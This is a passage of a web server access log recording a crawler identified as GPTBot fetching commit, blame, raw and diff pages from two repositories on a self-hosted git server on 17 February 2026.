GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:13:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:13:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 14178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11618] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:13:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:13:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81765] [Gzip 50.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" +[17/Feb/2026:13:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 74.7.227.38] [Length 10604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11491] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:13:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 13281] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" +[17/Feb/2026:13:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:13:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:13:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10390] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 11315] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:13:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" +[17/Feb/2026:13:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" +[17/Feb/2026:13:14:54 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:13:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" +[17/Feb/2026:13:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10830] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" +[17/Feb/2026:13:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:13:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:13:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:13:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" +[17/Feb/2026:13:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10184] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 37081] [Gzip 24.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42720] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" +[17/Feb/2026:13:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977.patch" [Client 74.7.227.38] [Length 237658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977.diff" [Client 74.7.227.38] [Length 235614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 10419] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15903] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:13:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14659] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" +[17/Feb/2026:13:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746.diff" [Client 74.7.227.38] [Length 698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 74.7.227.38] [Length 10331] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" +[17/Feb/2026:13:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 10030] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 37117] [Gzip 24.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" [Client 74.7.227.38] [Length 11547] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 74.7.227.38] [Length 14560] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:13:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129.diff" [Client 74.7.227.38] [Length 1557] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 10900] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 12903] [Gzip 6.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:13:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:13:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:13:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 10780] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff" [Client 74.7.227.38] [Length 6541922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10867] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" [Client 74.7.227.38] [Length 10071] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:13:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" [Client 74.7.227.38] [Length 14396] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:13:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 14384] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:13:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] 